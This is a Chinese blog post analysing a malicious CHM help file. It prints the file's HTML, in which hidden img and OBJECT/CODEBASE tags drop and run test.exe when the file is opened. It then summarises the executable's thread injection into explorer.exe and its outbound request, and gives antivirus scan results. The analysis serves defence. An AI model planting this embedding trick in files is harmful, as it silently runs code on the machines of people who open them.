`
caobihole
  • 浏览: 941551 次
文章分类
社区版块
存档分类
最新评论

[06-20] 一个释放/运行EXE文件的CHM文件 Trojan.DL.Inject.fg(TrojanDownloader.Small.mp)(第3版)

 
阅读更多

endurer 原创

2006-06-20 第3版 补充:瑞星18.32.10将test.exe报为Trojan.DL.Inject.fg
2006-06-19 第2版 补充:江民KV将test.exe报为TrojanDownloader.Small.mp
2006-06-18 第1

一位网发来的cHM文件中有代码:


<body onselectstart="return false"; onpaste="return false";>
<img src="test.exe" width=0 height=0>
<img src="001.jpg">
<object id="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="test.exe">
</object>


因此打开此CHM文件会释放/运行一个名为test.exe的文件。

test.exe用Microsoft Visual C++ 编写,经UPX压缩,会用线程插入explorer.exe,试图访问:hxxp://gd.vnet.cn


File: test.exe
Status: POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database)
MD5 1d0b29b416ebe8e942173a326eb6e1ed
Packers detected: UPX
Scanner results
AntiVir Found Heuristic/Hijacker (probable variant)
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
UNA Found nothing
VirusBuster Found nothing
VBA32 Found nothing

分享到:
评论

相关推荐

Global site tag (gtag.js) - Google Analytics